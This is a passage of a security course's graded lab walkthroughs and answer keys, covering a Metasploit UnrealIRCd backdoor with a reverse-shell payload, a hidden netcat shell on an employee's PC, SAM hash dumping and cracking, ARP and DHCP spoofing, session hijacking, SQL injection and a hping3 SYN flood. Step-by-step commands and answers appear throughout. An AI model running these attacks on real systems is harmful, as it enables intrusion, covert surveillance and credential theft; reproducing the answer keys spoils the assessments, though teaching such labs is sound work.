Sara Goodwin Wow!! Malicious Attachment Delete Emails with attachments from random people who address you as "Dear Friend" are probably not safe. Grandma Jacklin Free Airline Tickets Hoax Delete Any email that asks you to forward it to everyone you know is probably a hoax, even if the contents promise you a prize. In addition, there is no way to know how many people the email has been forwarded to. Human Resources IMPORTANT NOTICE-Action Required Safe Keep While this email appears very urgent, it doesn't ask you to click on anything or run any attachments. It does inform you that you need to go a website that you should already know and make sure your courses are complete. Activities Committee Pumpkin Contest Safe Keep This email doesn't ask you to click on anything or run any attachments. Robert Williams Presentation Safe Keep This email doesn't ask you to click on anything or run any attachments. QUESTION 5: You are an ethical hacker consultant working for CorpNet. They want you to discover weaknesses in their network. From outside the CorpNet network, you used Zenmap and discovered that the www_stage server located in CorpNet's DMZ is running an exploitable application named UnrealIRCd. This allows you to set up a backdoor using Metasploit. In this lab, your task is to:

• Create a backdoor on www_stage using Metasploit by exploiting the UnrealIRCd application using the following information: o Search for Unreal exploits. o Use the exploit that allows Backdoor Command Execution. o Configure the remote host (RHOST) with the 198.28.1.15 IP address; the same IP address as www_stage. o Set the payload to the cmd/unix/reverse payload. o Verify that the local host (LHOST) was set to the 147.191.29.15 IP address (the same IP address as Consult-Lap2). o Execute the exploit. o Read the contents of the text file in the /root directory. • Answer the question. “ In Terminal, you can highlight the text and right-click it to copy and paste the highlighted text to the cursor's location. ” Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 8 minutes 18 seconds Required Score: 100% Task Summary Lab Questions Create a backdoor on www_stage by exploiting the UrealIRDd application Q1 What is the name of the new feature added to the tracking app on www_stage? Explanation In this lab, your task is to: • Create a backdoor on www_stage using Metasploit by exploiting the UnrealIRCd application using the following information: o Search for Unreal exploits. o Use the exploit that allows Backdoor Command Execution.

o Configure the remote host (RHOST) with the 198.28.1.15 IP address; the same IP address as www_stage. o Set the payload to the cmd/unix/reverse payload. o Verify that the local host (LHOST) was set to the 147.191.29.15 IP address; the same IP address as Consult-Lap2. o Execute the exploit. o Read the contents of the text file in the /root directory. • Answer the question. Complete this lab as follows: 1. Search for UrealIRCd exploits and review the exploit information as follows: a. From the Favorites bar, open Metasploit Framework. b. At the prompt, type search Unreal and press Enter to search for any UnrealIRCd exploits. c. Type info exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to review the exploit information. Notice that RHOST is required. 2. Use the exploit/unix/irc/unreal_ircd_3281_backdoor exploit and configure the exploit's RHOST IP address as follows: a. Type use exploit/unix/irc/unreal_ircd_3281_backdoor and press Enter to use the exploit. b. Type show options and press Enter . Notice the absence of the current setting for RHOST. c. Type set RHOST 198.28.1.15 and press Enter to configure the remote host setting. d. Type show options and press Enter to confirm that RHOST is set. 3. Set the payload as follows: a. Type show payloads and press Enter to list available payloads. b. Type set payload cmd/unix/reverse and press Enter to specify the correct payload. c. Type show options and press Enter to review the exploit's configuration. Notice that LHOST is automatically set to the IP address for Consult-Lap2. 4. Execute the exploit and examine the text file in the /root directory as follows: a. Type exploit and press Enter to execute the exploit. b. Type ifconfig and press Enter to confirm that the backdoor has been established. Notice the IP address is 198.28.1.15; the same IP address as www_stage. c. Type pwd and press Enter to confirm you are in the /root directory. d. Type ls and press Enter to list the files in the /root directory. e. Type cat Staging_Features_CONFIDENTIAL.txt and press Enter to review the contents of a file that appears to contain sensitive information. 5. In the top right, select Answer Questions . 6. Answer the question. 7. Select Score Lab .

Lab Questions: 1. In Terminal, you can highlight the test. 2. Right-click it to copy and paste the highlighted text to the cursor’s location . QUESTION 6: You are the IT security administrator for a small corporate network. You suspect an employee is misusing a company computer by downloading copyrighted music files at work and storing them on an external drive. You notice that the employee has gone to lunch and decide to use this opportunity to set up a backdoor access and to investigate the external drive at a later time when the employee connects the drive to the computer. You begin by installing netcat on the employee's computer and adding the C:/netcat folder to the path environment variable so that it can be run outside of the folder. In this lab, your task is to: • Run netcat from a PowerShell window on Office1 as follows: o Execute netcat in detached mode so that it runs in the background when the command prompt window is closed. o Execute netcat in listen mode. o Configure netcat to listen for connections on port 2222. o Configure netcat to execute cmd.exe when a connection is made. • Run netcat on IT-Laptop and connect to Office1 as follows: o Connect using the hostname or IP address. o Connect using port 2222. • Inspect the external hard drive (G: drive) for music and video files. “ The second task would be performed after the employee returned from lunch and connected an external drive to Office1. ”

Your Performance Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 1 minute 59 seconds Required Score: 100% Task Summary Required Actions Execute netcat on Office1 (listen mode) Execute netcat on IT-Laptop (client mode) Inspect external hard drive (G: drive) Explanation In this lab, your task is to: • Run netcat from a PowerShell window on Office1 using the following information: o Execute netcat in detached mode so that it runs in the background when the command prompt window is closed. o Execute netcat in listen mode. o Configure netcat to listen for connections on port 2222. o Configure netcat to execute cmd.exe when a connection is made. • Run netcat on IT-Laptop and connect to Office1 using the following information: o Connect using the hostname or IP address. o Connect using port 2222. • Inspect the external hard drive (G: drive) for music and video files. Complete this lab as follows: 1. On Office1, run netcat from a PowerShell window as follows: a. Right-click Start and select Windows Powershell (Admin) . b. At the prompt, type nc -dlp 2222 -e cmd.exe and press Enter to start netcat in listen mode. c. Close the PowerShell window so the employee doesn't see an open window. 2. On IT-Laptop, run netcat to connect to Office1 as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under IT Administration, select IT-Laptop . c. From the Favorites bar, open Terminal. d. At the prompt, type nc Office1 2222 and press Enter to start netcat in client mode. 3. Type dir /s g: and press Enter to inspect the G: drive.

QUESTION 7: As the cybersecurity specialist for your company, you're performing a penetration test. As part of this test, you're checking to see if the Security Account Manager (SAM) passwords from a Windows system can be cracked using John the Ripper. In this lab, your task is to crack the SAM passwords as follows: • On Office 1, use pwdump7 to export the contents of the SAM to SAMhash.txt. This machine has already been booted into a recovery mode, allowing you to use Troubleshoot > Advanced > Command Prompt to access the SAM file. • Copy the exported file to the thumb drive (g: drive) and then move the thumb drive to the IT-Laptop computer. After the thumb drive is inserted, it is automatically mounted to /media/root/ESD-USB/. • On IT-Laptop, crack the password using the echo and John the Ripper commands. “ Use the cat command to display the password hash file that was copied to the thumb drive. Do NOT run the echo or John the Ripper commands from the thumb drive. ” Your Performance Your Score: 4 of 4 (100%) Pass Status: Pass Elapsed Time: 8 minutes 23 seconds Required Score: 100% Task Summary Required Actions & Questions Use cat /media/root/ESD-USB/file_name.txt to display the password hashes contained in the file

Use the echo command to create a new hash file that contains the Admin's NTLM hash Use John the Ripper to crack the password Q1 What is the password found in the cracked SAM? Explanation In this lab, your task is to crack the SAM passwords as follows: • On Office 1, use pwdump7 to export the contents of the SAM to SAMhash.txt. • Copy the exported file to the thumb drive and move the thumb drive to the IT-Laptop computer. • On IT-Laptop, crack the password using the echo and John the Ripper commands. Complete this lab as follows: 1. Use pwdump7 to create a text file containing the SAM password hashes and copy the new file to the thumb drive as follows: a. From the recovery dialog, select Troubleshoot . b. Select Advanced options . c. Select Command Prompt . d. Type pwdump7 > SAMhash.txt and press Enter . e. Type copy SAMhash.txt g: and press Enter . 2. Move the thumb drive from Office 1 to the IT-Laptop computer as follows: a. From the top navigation tabs, select Office 1 . b. Select the USB Thumb Drive plugged into the front of the computer. c. Drag the USB Thumb Drive to the Shelf so you can access it later in the IT Administration office. d. From the top navigation tabs, select Floor 1 Overview . e. Under IT Administration, select Hardware . f. Above IT-Laptop, select Back to switch to the back view of the laptop. g. From the Shelf, drag the USB Thumb Drive to a USB port on the laptop computer. h. Above IT-Laptop, select Front to switch to the front view of the laptop. i. On the monitor, select Click to view Linux . 3. Create a new hash file that contains the hash to be cracked as follows: a. From the Favorites bar, open Terminal. b. Type cat /media/root/ESD-USB/SAMhash.txt and press Enter . c. Type echo . d. Press the space bar. e. In the Admin line of the output, select the hash in the fourth field. Each field is separated by a colon. This is the hash value that needs to be cracked. f. Right-click the hash in the fourth field of the Admin line. Notice that the hash was pasted into the command line. g. Press the space bar. h. Type > SAMhash.txt . i. Press Enter . 4. Use John the Ripper and the new hash file to crack the password as follows:

a. Type john SAMhash.txt and press Enter . b. From the output, find the Admin's password . c. In the top right, select Answer Questions . d. Answer the questions. e. Select Score Lab . Lab Questions: a. What is the password found in the cracked SAM? b. P@55word! QUESTION 8: You are the IT security administrator for a small corporate network. The HR director is concerned that an employee is doing something sneaky on the company's employee portal and has authorized you to hijack his web session so you can investigate. In this lab, your task is to hijack a web session as follows: • On IT-Laptop, use Ettercap to sniff traffic between the employee's computer in Office1 and the gateway. • Initiate a man-in-the-middle attack to capture the session ID for the employee portal logon. • On Office1, log in to the employee portal on rmksupplies.com using Chrome and the following credentials: o Username: bjackson o Password: $uper$ecret1 • On IT-Laptop, copy the session ID detected in Ettercap. • On Office2, navigate to rmksupplies.com and use the cookie editor plug-in in Chrome to inject the session ID cookie. • Verify that you hijacked the session. Your Performance Your Score: 6 of 6 (100%) Pass Status:

Pass Elapsed Time: 12 minutes 49 seconds Required Score: 100% Task Summary Required Actions Select the enp2s0 interface Set Office1 as a target Set the gateway as a target Launch the MITM Arp poison attack with Sniff Remote Connections Login to RMKSupplies on Office1 Hijack the session on Office2 Explanation In this lab, your task is to hijack a web session as follows: • On IT-Laptop, use Ettercap to sniff traffic between the employee's computer in Office1 and the gateway. • Initiate a man-in-the-middle attack to capture the session ID for the employee portal logon. • On Office1, log in to the employee portal on rmksupplies.com using the following credentials: o Username: bjackson o Password: $uper$ecret1 • On IT-Laptop, copy the session ID detected in Ettercap. • On Office2, navigate to rmksupplies.com and use the cookie editor plug-in in Chrome to inject the session ID cookie. • Verify that you hijacked the session. Complete this lab as follows: 1. On IT-Laptop, open Terminal from the sidebar. 2. At the prompt, type host office1 and press Enter to get the IP address of Office1. 3. Type route and press Enter to get the gateway address. 4. Use Ettercap to sniff traffic between Office1 and the gateway as follows: a. From the Favorites bar, open Ettercap. b. Maximize the window for easier viewing. c. Select Sniff > Unified sniffing . d. From the Network Interface drop-down list, select enp2s0 . e. Click OK . f. Select Hosts > Scan for hosts . g. Select Hosts > Host list . We want to target information between Office1 (192.168.0.33) and the gateway (192.168.0.5). h. Under IP Address, select 192.168.0.5 .

i. Select Add to Target 1 . j. Select 192.168.0.33 . k. Select Add to Target 2 . 5. Initiate a man-in-the-middle attack as follows: a. Select Mitm > ARP poisoning . b. Select Sniff remote connections . c. Click OK . You are ready to capture traffic. 6. On Office1, log in to the employee portal on rmksupplies.com as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under Office 1, select Office1 . c. From the taskbar, open Chrome. d. Maximize the window for easier viewing. e. In the URL field, enter rmksupplies.com . f. Press Enter . g. At the bottom of the page, select Employee Portal . h. In the Username field, enter bjackson . i. In the Password field, enter $uper$ecret1 . j. Click Login . You are logged into the portal as Blake Jackson. 7. On IT-Laptop, copy the session ID detected in Ettercap as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under IT Administration, select IT-Laptop . c. In the Ettercap console, find bjackson's username , password , and session cookie (.login) captured in Ettercap. d. Highlight the session ID . e. Press Ctrl + C to copy. 8. On Office2, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under Office 2, select Office2 . c. From the taskbar, open Chrome. d. Maximize the window for easier viewing. e. In Chrome's URL field, enter rmksupplies.com . f. Press Enter . g. In the top right corner, select cookie to open the cookie editor. h. At the top, select the plus + sign to add a new session cookie. i. In the Name field, enter .login j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap. k. Make sure rmksupplies.com is in the Domain field. l. Select the green check mark to save the cookie. m. Click outside the cookie editor to close the editor. 9. At the bottom of the rkmsupplies page, select Employee Portal . You are now on Blake Jackson's web session.

QUESTION 9: You are a cybersecurity consultant. The company hiring you suspects that employees are connecting to a rogue access point (AP). You need to find the name of the hidden rogue AP so it can be deauthorized. The computer suspected of using the rogue access point is Exec-Laptop. In this lab, your task is to complete the following: • On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode. • Use airodump-ng to find the hidden access point. • On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID. • Answer the question. Your Performance Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 4 minutes 5 seconds Required Score: 100% Task Summary Required Actions & Questions Set the the wlp1s0 wireless adapter to monitor mode Find the hidden access point Q1 What is the BSSID of the rogue access point? Explanation In this lab, your task is to complete the following: • On IT-Laptop, use airmon-ng to put the wireless adapter in monitor mode. • Use airodump-ng to find the hidden access point. • On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID. • Answer the question.

Complete this lab as follows: 1. On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type airmon-ng and press Enter to find the name of the wireless adapter. c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode. d. Type airmon-ng and press Enter to view the new name of the wireless adapter. 2. Use airodump-ng to discover and isolate the hidden access point as follows: a. Type airodump-ng wlp1s0mon and press Enter to discover all of the access points. b. Press Ctrl + c to stop airodump-ng. c. Find the hidden access point ESSID <length : 0> . d. In the top right, select Answer Questions . e. Answer the question. f. In Terminal, type airodump-ng wlp1s0mon --bssid bssid_number and press Enter to isolate the hidden access point. 3. Switch to the Exec-Laptop and connect to the Wi-Fi network as follows: a. From the top navigation tabs, select Floor 1 Overview . b. Under Executive Office, select Exec-Laptop . c. From the notification area, select the Wi-Fi network icon. d. Select Hidden Network . e. Select Connect . f. In the Enter the name (SSID) for the network field, type CoffeeShop . In a real environment, you'll only need to wait until the employee connects to the rogue access point again. g. Select Next . h. Select Yes . i. Under Lab Questions, select Score Lab . Lab Questions: 1. What is the BSSID of the rogue access point? a. 00:00:1B:11:22:33

A.2.3 Pro Domain 3: Attack QUESTION 1: You are the cybersecurity specialist for your company. You need to check to see if any clear text passwords are being exposed to hackers through an HTTP login request. In this lab, your task is to analyze HTTP POST packets as follows: • Use Wireshark to capture all packets. • Filter the captured packets to show only HTTP POST data. • Examine the packets captured to find clear text passwords. • Answer the questions. Your Performance Your Score: 4 of 4 (100%) Pass Status: Pass Elapsed Time: 2 minutes 15 seconds Required Score: 100% Task Summary Required Actions & Questions Filter the captured packets to show only HTTP POST data Q1 How many HTTP POST packets were captured? Q2 What is the source IP address of the packet containing the clear text password? Q3 What is the clear text password captured? Explanation In this lab, your task is to analyze HTTP POST packets as follows: • Use Wireshark to capture all packets. • Filter the captured packets to show only HTTP POST data. • Examine the packets captured to find clear text passwords.

• Answer the questions. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. Select the blue fin to begin a Wireshark capture. 4. Capture packets for five seconds. 5. Select the red box to stop the Wireshark capture. 6. Maximize Wireshark for easier viewing. 7. In the Apply a display filter field, type http.request.method==POST and press Enter to show the HTTP POST requests. 8. From the middle pane, expand HTML Form URL Encoded for each packet. 9. Examine the information shown to find clear text passwords. 10. In the top right, select Answer Questions . 11. Answer the questions. 12. Select Score Lab . Lab Questions: 1. How many HTTP POST packets were captured? a. 3 2. What is the source IP address of the packets containing the clear text password? a. 192.168.0.98 3. What is the captured clear text password? a. St0ne$@ QUESTION 2: You are the IT security administrator for a small corporate network. You're experimenting with DHCP spoofing attacks using Ettercap. In this lab, your task is to complete the following: • On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP spoofing attack using the following parameters: o Netmask: 255.255.255.0 o DNS Server IP: 192.168.0.11 • On Support, complete the following tasks:

o Start a capture in Wireshark and filter the display for DHCP traffic. o View the IP address and the gateway in Terminal. o Bring the network interface down and back up to request a new DHCP address. o In Wireshark, how many DHCP packets were exchanged? o View the IP address and gateway again. What has changed? • On Office1, complete the following tasks: o Use tracert to rmksupplies.com to find the path. What is the path? o Check the IP address of the computer. o Release and renew the IP address assigned by DHCP. o Check the IP address of the computer again. What has changed? o Use tracert to rmksupplies.com to find the path again. What has changed? o Log in to the rmksupplies.com employee portal with the following credentials: ▪ Username: bjackson ▪ Password: $uper$ecret1 • On IT-Laptop, find the captured username and password in Ettercap. • Answer the questions. Your Performance Your Score: 5 of 5 (100%) Pass Status: Pass Elapsed Time: 8 minutes 25 seconds Required Score: 100% Task Summary Required Actions & Questions On IT-Laptop, launch a DHCP MITM attack using Ettercap On Support: Hide Details

View the DHCP traffic in Wireshark with the bootp filter Refresh the network interface to get a new IP address from DHCP Q1 How many DHCP packets were captured in Wireshark? Q2 Which gateway addresses are provided in the ACK packets? On Office1: Hide Details Use tracert to view the path to rmksupplies.com Use ipconfig to release and renew the assigned IP address Login to the rmksupplies.com Employee Portal Explanation In this lab, your task is to complete the following: • On IT-Laptop, use Ettercap to launch a man-in-the-middle DHCP spoofing attack using the following parameters: o Netmask: 255.255.255.0 o DNS Server IP: 192.168.0.11 • On Support, complete the following tasks: o Start a capture in Wireshark and filter the display for DHCP traffic. o View the IP address and the gateway in Terminal. o Bring the network interface down and back up to request a new DHCP address. o In Wireshark, how many DHCP packets were exchanged? o View the IP address and gateway again. What has changed? • On Office1, complete the following tasks: o Use tracert to rmksupplies.com to find the path. What is the path? o Check the IP address of the computer. o Release and renew the IP address assigned by DHCP. o Check the IP address of the computer again. What has changed? o Use tracert to rmksupplies.com to find the path again. What has changed? o Login to the rmksupplies.com Employee Portal with the following credentials: ▪ Username: bjackson ▪ Password: $uper$ecret1 • On IT-Laptop, find the captured username and password in Ettercap. • Answer the questions Complete this lab as follows: 1. On IT-Laptop, start unified sniffing on the enp2s0 interface as follows: a. From the Favorites bar, select Ettercap . b. Select Sniff > Unified sniffing . c. From the Network Interface drop-down list, select enp2s0 . d. Click OK . e. Select Mitm > DHCP spoofing . f. In the Netmask field, enter 255.255.255.0 . g. In the DNS Server IP field, enter 192.168.0.11 .

h. Click OK . 2. On Support, start a capture that filters for bootp packets as follows: a. From top navigation tabs, select Floor 1 Overview . b. Under Support Office, select Support . c. From the Favorites bar, open Wireshark. d. Under Capture, select enp2s0 . e. Select the blue fin to begin a Wireshark capture. f. In the Apply a display filter field, type bootp and press Enter . 3. Request a new IP address as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type ip addr show and press Enter . The IP address for enp2s0 is 192.168.0.45. c. Type route and press Enter . The gateway is 192.168.0.5. d. Type ip link set enp2s0 down and press Enter . e. Type ip link set enp2s0 up and press Enter to bring the interface back up. f. Maximize Wireshark for easier viewing. In Wireshark, under the Info column, notice that there are two DHCP ACK packets. One is the real acknowledgment (ACK) packet from the DHCP server, and the other is the spoofed ACK packet. g. Select the first DHCP ACK packet received. h. In the middle panel, expand Bootstrap Protocol (ACK) . i. Expand Option: (3) Router . Notice the IP address for the router. j. Repeat steps 3g-3i for the second ACK packet. k. In the top right, select Answer Questions . l. Answer the questions. m. Minimize Wireshark. 4. View the current IP addresses as follows: a. In Terminal at the prompt, type ip addr show and press Enter . The IP address is 192.168.0.45. b. Type route and press Enter . The current gateway is 192.168.0.46. This is the address of the computer performing the man-in-the-middle attack. 5. On Office1, view the current route and IP address as follows: a. From top navigation tabs, select Floor 1 Overview . b. Under Office 1, select Office1 . c. Right-click Start and select Windows PowerShell (Admin) . d. Type tracert rmksupplies.com and press Enter . Notice that the first hop is 192.168.0.5. e. Type ipconfig /all and press Enter to view the IP address configuration for the computer. The configuration for Office1 is as follows: ▪ IP address: 192.168.0.33 ▪ Gateway: 192.168.0.5 ▪ DHCP server: 192.168.0.14

f. At the prompt, type ipconfig /release and press Enter to release the currently assigned addresses. g. Type ipconfig /renew and press Enter to request a new IP address from the DHCP server. Notice that the default gateway has changed to the attacker's computer which has an IP address of 192.168.0.46. h. Type tracert rmksupplies.com and press Enter . Notice that the first hop is now 192.168.0.46 (the address of the attacker's computer). 6. In Google Chrome, log into the rmksupplies.com employee portal as follows: a. From the taskbar, open Google Chrome. b. Maximize the window for easier viewing. c. In the URL field, enter rmksupplies.com and press Enter . d. At the bottom of the page, select Employee Portal . e. In the Username field, enter bjackson . f. In the Password field, enter $uper$ecret1 . g. Select Login . You are logged in as Blake Jackson. 7. From IT-Laptop, find the captured username and password in Ettercap as follows: a. From top navigation tabs, select Floor 1 Overview . b. Under IT Administration, select IT-Laptop . c. Maximize Ettercap. d. In Ettercap's bottom pane, find the username and password used to log in to the employee portal. 8. In the top right, select Answer Questions to end the lab. 9. Select Score Lab . Lab Questions: 1. How many DHCP packets were captured in Wireshark? a. 5 2. Which gateway addresses are provided in the ACK packets? a. 192.168.0.5 b. 192.168.0.46 QUESTION 3: CorpNet.xyz has hired you as a penetration testing consultant. While visiting the company, you connected a small computer to the switch in the Networking Closet. This computer also functions as a rogue

wireless access point. Now you are sitting in your van in the parking lot of CorpNet.xyz, where you have connected to the internal network through the rogue wireless access point. Using the small computer you left behind, you can perform remote exploits against the company. In this lab, your task is to complete the following: • On Consult-Lap2, use ssh -X to connect to your rogue computer using the following parameters: o IP address: 192.168.0.251 o Password: $uper$neaky • Use Ettercap and the following parameters to launch a DHCP spoofing man-in-the-middle attack on your rogue computer and attempt to capture any unsecure passwords: o Network Interface: enp2s0 o Netmask: 255.255.255.0 o DNS Server IP address: 192.168.0.11 • On Exec, release and renew the IP address assigned by DHCP. • Log in to the rmksupplies.com employee portal using the following credentials: o Username: bjackson o Password: $uper$ecret1 • On Consult-Lap2, copy the session ID detected in Ettercap. • On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie. • Verify that you have hijacked the session. Your Performance Your Score: 6 of 6 (100%) Pass Status: Pass Elapsed Time: 5 minutes 5 seconds Required Score: 100% Task Summary Required Actions Use ssh -X to connect to the remote computer Launch an MITM attack

On Exec, release and renew the IP address Inject the session ID into a cookie Hijack the session Login to the rmksupplies Employee Portal Explanation In this lab, your task is to complete the following: • On Consult-Lap2, use ssh -X to connect to your rogue computer using the following paramenters: o IP address: 192.168.0.251 o Password: $uper$neaky • Use Ettercap and the following parameters to launch a DHCP spoofing man-in-the- middle attack on your rogue computer and attempt to capture any unsecure passwords: o Network Interface: enp2s0 o Netmask: 255.255.255.0 o DNS Server IP address: 192.168.0.11 • On Exec, release and renew the IP address assigned by DHCP. • Log in to the rmksupplies.com employee portal using the following credentials: o Username: bjackson o Password: $uper$ecret1 • On Consult-Lap2, copy the session ID detected in Ettercap. • On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie. • Verify that you have hijacked the session. Complete this lab as follows: 1. From Conult-Lap2, connect to your rogue computer as follows: a. From the Favorites bar, open Terminal. b. At the prompt, type ssh -X 192.168.0.251 and press Enter . c. For the password, type $uper$neaky and press Enter . You are now connected to Rogue1. 2. Use Ettercap to launch a DHCP spoofing man-in-the-middle attack as follows: a. At the prompt, type ettercap and press Enter to launch Ettercap remotely. Ettercap is running on the remote computer, but you see the screen locally. b. Select Sniff . c. Select Unified sniffing . d. From the Network Interface drop-down list, select enp2s0 . e. Click OK . f. Select Mitm . g. Select DHCP spoofing . h. In the Netmask field, enter 255.255.255.0 . i. In the DNS Server IP field, enter 192.168.0.11 . j. Click OK . 3. On Exec, release and renew the IP address as follows:

a. From top navigation tabs, select Buildings . b. Under Building A, select Floor 1 . c. Under Executive Office, select Exec . d. Right-click Start and select Windows PowerShell (Admin) . e. Type ipconfig /release and press Enter to release the currently assigned addresses. f. Type ipconfig /renew and press Enter to request a new IP address from the DHCP server. 4. Log into the rmksupplies.com employee portal as follows: a. From the taskbar, open Chrome. b. Maximize the window for easier viewing. c. In the URL field, enter rmksupplies.com and press Enter . d. At the bottom of the page, select Employee Portal . e. In the Username field, enter bjackson . f. In the Password field, enter $uper$ecret1 . g. Select Login . You are logged in as Blake Jackson. 5. On Consult-Lap2, copy the session ID detected in Ettercap as follows: a. From the top navigation tabs, select Building A . b. Under Red Cell, select Consult-Lap2 . c. In the Ettercap console, find bjackson's username , password , and session cookie (.login) captured in Ettercap. d. Highlight the session ID . e. Press Ctrl + C to copy. 6. On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the session ID cookie as follows: a. From the top navigation tabs, select Building A . b. Under Red Cell, select Consult-Lap . c. From the taskbar, open Chrome. d. Maximize the window for easier viewing. e. In Chrome's URL field, enter rmksupplies.com . f. Press Enter . g. In the top right corner, select cookie to open the cookie editor. h. At the top, select the plus + sign to add a new session cookie. i. In the Name field, enter .login j. In the Value field, press Ctrl + V to paste in the session cookie you copied from Ettercap. k. Make sure rmksupplies.com appears in the Domain field. l. Select the green check mark to save the cookie. m. Click outside the cookie editor to close the editor. n. At the bottom of the rkmsupplies page, select Employee Portal . You are now on Blake Jackson's web session on your external computer.

QUESTION 4: You are the penetration tester for a small corporate network. You have decided to see how secure your online bank's web page is. In this lab, your task is to perform a simple SQL injection attack on MySecureOnlineBank.com using the following information: • Make an account query for account number 90342 . • Perform a simple SQL attack using 0 OR 1=1 . • Answer the questions. Your Performance Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 1 minute 1 second Required Score: 100% Task Summary Lab Questions Q1 What is your account balance? Q2 What is the account number of Nisha Dickson? Explanation In this lab, your task is to perform a simple SQL injection attack on MySecureOnlineBank.com using the following information: • Make an account query for account number 90342 . • Perform a simple SQL attack using 0 OR 1=1 . • Answer the questions. Complete this lab as follows: 1. From the taskbar, open Chrome. 2. Maximize the window for easier viewing. 3. In the URL field, type mysecureonlinebank.com 4. Press Enter . 5. In the Enter your Account Number field, enter 90342 .

6. Select Lookup . The account balance is $582.29. 7. In the top right, select Answer Questions . 8. Answer question 1. 9. In the Enter your Account Number field, enter 0 OR 1=1 for the SQL injection. 10. Select Lookup . 11. Answer question 2. 12. Select Score Lab . Lab Questions: 1. What is your account balance? a. $582.29 2. What is Nisha Dickson’s account number ? a. 90003 QUESTION 5: You are the CorpNet IT administrator. Your support team says that CorpNet's customers are unable to browse to the public-facing web server. You suspect that it might be under some sort of denial-of- service attack, possibly a TCP SYN flood attack. Your www_stage computer is on the same network segment as your web server, so you'll use this computer to investigate the problem. In this lab, your task is to: • Capture packets from the network segment on www_stage using Wireshark. • Analyze the attack using the following filters: o tcp.flags.syn==1 and tcp.flags.ack==1 o tcp.flags.syn==1 and tcp.flags.ack==0 • Answer the question. Your Performance

Your Score: 2 of 2 (100%) Pass Status: Pass Elapsed Time: 2 minutes 44 seconds Required Score: 100% Task Summary Lab Questions Filter for SYN and ACK packets Q1 What indicates that this is a distributed denial-of-service (DDoS) attack? Explanation In this lab, your task is to: • Capture packets from the network segment on www_stage using Wireshark. • Analyze the attack using the following filters: o tcp.flags.syn==1 and tcp.flags.ack==1 o tcp.flags.syn==1 and tcp.flags.ack==0 • Answer the question. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. From the menu, select the blue fin to begin the capture. 4. In the Apply a display filter field, type tcp.flags.syn==1 and tcp.flags.ack==1 and press Enter to filter the Wireshark display to only those packets with both the SYN flag and ACK flag. You may have to wait several seconds before any SYN-ACK packets are captured and displayed. 5. Select the red square to stop the capture. 6. In the Apply a display filter field, change the tcp.flags.ack ending from 1 to 0 and press Enter to filter the Wireshark display to packets with only the SYN flag. Notice that there are a flood of SYN packets being sent to 128.28.1.1 (www.corpnet.xyz) that were not being acknowledged. 7. In the top right, select Answer Questions . 8. Answer the question. 9. Select Score Lab . Lab Questions: 1. What indicates that this is a distributed denial-of-service (DDoS) attack? a. There are multiple source addresses for the SYN packets with the destination address 128.28.1.1.

QUESTION 6: As the IT administrator for a small corporate network, you want to know how to find and recognize a TCP SYN flood attack. You know you can do this using the Wireshark packet analyzer and a Linux tool named hping3. In this lab, your task is to use Wireshark to capture and analyze TCP SYN flood attacks as follows: • Filter captured packets to show TCP SYN packets for the enp2s0 interface. • Use hping3 to launch a SYN flood attack against rmksupplies.com using Terminal. • Examine a SYN packet with the destination address of 208.33.42.28 after capturing packets for a few seconds. • Answer the question. Your Performance Your Score: 3 of 3 (100%) Pass Status: Pass Elapsed Time: 2 minutes 38 seconds Required Score: 100% Task Summary Required Actions & Questions Filter SYN packets Launch an hping3 flood Q1 For the packet selected, what is the hex value for Flags? Explanation In this lab, your task is to use Wireshark to capture and analyze TCP SYN flood attacks as follows: • From Kali Linux, start a capture in Wireshark for the esp20 interface. • • Use hping3 to launch a SYN flood attack against rmksupplies.com using Terminal.

• Examine a SYN packet with the destination address of 208.33.42.28 after capturing packets for a few seconds. • Answer the question. Complete this lab as follows: 1. From the Favorites bar, open Wireshark. 2. Under Capture, select enp2s0 . 3. Select the blue fin to begin a Wireshark capture. 4. In the Apply a display filter field, type tcp.flags.syn==1 and press Enter . 5. From the Favorites bar, open Terminal. 6. At the prompt, type hping3 --syn --flood rmksupplies.com and press Enter to start a TCP SYN flood against the CorpDC domain controller. 7. After a few seconds of capturing packets, select the red box to stop the Wireshark capture 8. In the top pane of Wireshark, select one of the packets captured with a destination address of 208.33.42.28. 9. In the middle pane of Wireshark, expand Transmission Control Protocol . 10. Scroll down to Flags. Notice that both Flags in this pane and the Info column in the top pane show this as a SYN packet. 11. In the top right, select Answer Questions . 12. Answer the question. 13. Click Score Lab . Lab Questions: 1. For the packet selected, what is the hex value for Flags? a. 0x002 QUESTION 7: As the IT security administrator for a small corporate network, you need to simulate a SYN flood attack using Metasploit so you can complete a penetration test. In this lab, your task is to perform and monitor a SYN flood attack using the following information:

